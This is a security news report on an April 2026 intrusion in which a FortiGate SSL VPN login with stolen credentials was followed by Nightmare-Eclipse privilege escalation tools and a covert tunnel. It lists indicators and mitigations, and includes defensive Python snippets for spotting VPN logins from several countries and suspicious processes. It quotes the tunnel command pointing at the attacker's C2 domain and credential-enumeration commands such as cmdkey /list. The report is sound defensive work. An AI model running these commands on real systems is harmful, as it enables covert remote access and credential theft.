Hackers Exploit FortiGate SSL VPN with Nightmare-Eclipse Tools

Marcus Rodriguez
April 21, 2026

A real-world intrusion campaign has been observed leveraging publicly available Nightmare-Eclipse privilege escalation tools—BlueHammer, RedSun, and UnDefend—after what appears to be unauthorized access through a compromised FortiGate SSL VPN.

Table Of Content

  • Nightmare-Eclipse Tools Using FortiGate SSL VPN Access
  • Indicators of Compromise (IoCs)
  • Mitigation Guidance

The incident marks the first confirmed in-the-wild deployment of these tools against a live enterprise environment, raising urgent alarms for security teams globally.

The tools at the center of this incident were developed by a security researcher known as Chaotic Eclipse, also referred to as Nightmare-Eclipse, a pseudonymous figure who grew frustrated with Microsoft’s vulnerability disclosure process and publicly released a series of local privilege escalation (LPE) exploits in retaliation.

The three tools (BlueHammer, RedSun, and UnDefend) exploit logic flaws in Windows Defender’s privileged operations to escalate an attacker from an unprivileged user account to SYSTEM-level access, or to disrupt Defender’s security functions entirely, without requiring administrative rights.

Microsoft addressed BlueHammer in its April 2026 Patch Tuesday update, tracking it as CVE-2026-33825. However, as of publication, RedSun and UnDefend remain unpatched zero-days actively usable against fully updated Windows systems.

Nightmare-Eclipse Tools Using FortiGate SSL VPN Access

Huntress first detected suspected in-the-wild use of BlueHammer on April 10, 2026, when a binary named FunnyApp.exe, a build pulled directly from the public BlueHammer GitHub repository, was executed from a victim user’s Pictures folder and subsequently quarantined by Defender as Exploit:Win32/DfndrPEBluHmr.BZ.

Activity escalated on April 16, with investigators observing an execution of RedSun.exe from the user’s Downloads directory, alongside multiple executions of undef.exe (the UnDefend binary) from short two-letter subfolders such as ks and kk.

In a telling sign of operator inexperience, the threat actor invoked UnDefend with a misspelled -agressive flag and a -h help flag that the tool does not implement, demonstrating they had not fully read or understood the tooling.

Critically, none of the privilege escalation attempts succeeded: BlueHammer did not extract SAM credentials, RedSun did not overwrite TieringEngineService.exe in System32, and UnDefend was terminated by Huntress’ SOC during active remediation.

Customer-provided VPN logs revealed a critical piece of the puzzle. On April 15, 2026, at 13:44 UTC, an attacker initiated an SSL VPN connection to the victim’s FortiGate firewall using valid user credentials from IP 78.29.48[.]29, geolocated to Russia.

Subsequent unauthorized sessions tied to the same account were observed from 212.232.23[.]69 (Singapore) and 179.43.140[.]214 (Switzerland), a multi-geography access pattern consistent with credential abuse and possible credential resale or sharing.
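The multi-geography pattern above is straightforward to hunt for in VPN authentication logs. The following is an added example, not Huntress tooling or code from the article: it parses constructed log lines (the field layout and the GeoIP table are assumptions; real FortiGate events and GeoIP data differ) and flags any account whose successful SSL VPN logins originate from more than one country inside a configurable window.

```python
# Added example: flag VPN accounts with successful logins from several
# countries within a short window. Log format and GEO table are constructed.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines loosely modelled on SSL VPN login events; the
# first three source IPs and countries are the ones reported in the article.
SAMPLE_LOG = """\
2026-04-15T13:44:00Z user=jdoe action=ssl-login-ok srcip=78.29.48.29
2026-04-15T14:02:11Z user=jdoe action=ssl-login-ok srcip=212.232.23.69
2026-04-16T09:30:05Z user=jdoe action=ssl-login-ok srcip=179.43.140.214
2026-04-16T10:15:40Z user=asmith action=ssl-login-ok srcip=203.0.113.10
2026-04-16T10:20:01Z user=asmith action=ssl-login-fail srcip=198.51.100.7
"""

# Constructed GeoIP lookup standing in for a real GeoIP database.
GEO = {
    "78.29.48.29": "RU",
    "212.232.23.69": "SG",
    "179.43.140.214": "CH",
    "203.0.113.10": "US",
    "198.51.100.7": "DE",
}

def parse_line(line):
    """Split 'timestamp key=value ...' into a dict with a datetime 'ts'."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return rec

def multi_geo_accounts(log_text, window=timedelta(hours=48), geo=GEO):
    """Return {user: sorted country codes} for accounts whose successful
    logins come from more than one country within `window` of each other."""
    logins = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec["action"] == "ssl-login-ok":  # failed attempts are ignored here
            logins[rec["user"]].append((rec["ts"], geo.get(rec["srcip"], "??")))
    flagged = {}
    for user, events in logins.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            countries = {c for t, c in events[i:] if t - t0 <= window}
            if len(countries) > 1:
                flagged[user] = sorted(countries)
                break
    return flagged
```

Tune the window to the travel patterns your user base actually has; a 48-hour window catches the three-country sequence above while leaving single-country accounts alone.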

The most operationally dangerous component Huntress identified was a Go-compiled Windows binary dubbed BeigeBurrow, executing as agent.exe -server staybud.dpdns[.]org:443 -hide.

The tool uses HashiCorp’s Yamux multiplexing library to establish a persistent, covert TCP relay between the compromised host and attacker-controlled infrastructure over port 443, a port rarely blocked by enterprise firewalls.

Unlike the privilege escalation tools, BeigeBurrow successfully connected outbound and is the only component in the observed toolkit that achieved its intended purpose. Huntress noted it has observed BeigeBurrow in at least one other unrelated intrusion, though attribution remains unclear.

Beyond tool execution, Huntress confirmed the presence of a live, hands-on-keyboard threat actor through post-exploitation enumeration commands, including whoami /priv, cmdkey /list, and net group.

Notably, whoami /priv was spawned directly from an M365Copilot.exe process, an anomaly that investigators could not fully explain but noted occurred after the initial compromise and following BlueHammer’s first execution attempt.

Indicators of Compromise (IoCs)

Indicator | Type | Description
78.29.48[.]29 | IP | SSL VPN source, Russia
212.232.23[.]69 | IP | SSL VPN source, Singapore
179.43.140[.]214 | IP | SSL VPN source, Switzerland
staybud.dpdns[.]org | Domain | BeigeBurrow C2 server
FunnyApp.exe, RedSun.exe, undef.exe, z.exe | File | Nightmare-Eclipse binaries
Exploit:Win32/DfndrPEBluHmr.BZ | Defender alert | BlueHammer detection signature
a2b6c7a9...e2876b7c | SHA-256 | BeigeBurrow agent.exe hash

Mitigation Guidance

Organizations should treat any confirmed execution of these binaries as high-priority incident activity. Huntress recommends the following immediate actions:

  • Patch immediately: Apply Microsoft’s April 2026 Patch Tuesday update to remediate CVE-2026-33825 (BlueHammer).
  • Hunt for staging artifacts: Investigate user-writable paths such as Pictures and short subfolders under Downloads for binaries like FunnyApp.exe, RedSun.exe, undef.exe, and z.exe.
  • Review VPN authentication logs: Flag any account authenticating from multiple countries within a short timeframe.
  • Block and monitor tunneling behavior: Investigate any execution of agent.exe with -server and -hide flags, and block the domain staybud.dpdns[.]org.
  • Detect post-exploitation enumeration: Alert on whoami /priv, cmdkey /list, and net group spawned from unusual parent processes.
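The three endpoint checks in the list above (staging artifacts, the agent.exe tunnel flags, and enumeration from unusual parents) can be expressed as one triage pass over process-creation events. This is an added example, not Huntress detection content: the event field names, the sample events and the baseline of "expected" shell parents are assumptions made for the illustration.

```python
# Added example: triage constructed process-creation events against the
# three endpoint checks from the guidance. Field names are assumed.
import re

NE_BINARIES = {"funnyapp.exe", "redsun.exe", "undef.exe", "z.exe"}
ENUM_CMDS = ("whoami /priv", "cmdkey /list", "net group")
EXPECTED_SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}  # assumed baseline
# User-writable staging paths: Pictures, Downloads, or a two-letter subfolder of Downloads.
STAGING = re.compile(r"\\users\\[^\\]+\\(pictures|downloads(\\[a-z]{2})?)\\[^\\]+$", re.I)

def triage(event):
    """Return alert tags for one {'image', 'cmdline', 'parent'} event."""
    image = event["image"].lower()
    name = image.rsplit("\\", 1)[-1]
    cmd = event["cmdline"].lower()
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    alerts = []
    if name in NE_BINARIES and STAGING.search(image):
        alerts.append("nightmare-eclipse-staging")
    if name == "agent.exe" and "-server" in cmd and "-hide" in cmd:
        alerts.append("beigeburrow-tunnel")
    if any(c in cmd for c in ENUM_CMDS) and parent not in EXPECTED_SHELLS:
        alerts.append("enumeration-odd-parent")
    return alerts

# Constructed events echoing the article's observations (paths are made up).
EVENTS = [
    {"image": r"C:\Users\victim\Pictures\FunnyApp.exe", "cmdline": "FunnyApp.exe",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Users\victim\Downloads\ks\undef.exe",
     "cmdline": "undef.exe -agressive -h", "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Users\victim\Downloads\agent.exe",
     "cmdline": "agent.exe -server staybud.dpdns[.]org:443 -hide",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami /priv",
     "parent": r"C:\Program Files\M365Copilot.exe"},
    {"image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami /priv",
     "parent": r"C:\Windows\System32\cmd.exe"},
]

def triage_all(events=EVENTS):
    """Return [(image basename, alert tags)] for every event."""
    return [(e["image"].rsplit("\\", 1)[-1], triage(e)) for e in events]
```

The last event shows the baseline in action: the same whoami /priv from cmd.exe raises nothing, while the copy spawned from M365Copilot.exe is flagged.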

A YARA detection rule for BeigeBurrow has been published publicly to aid community-wide detection efforts.
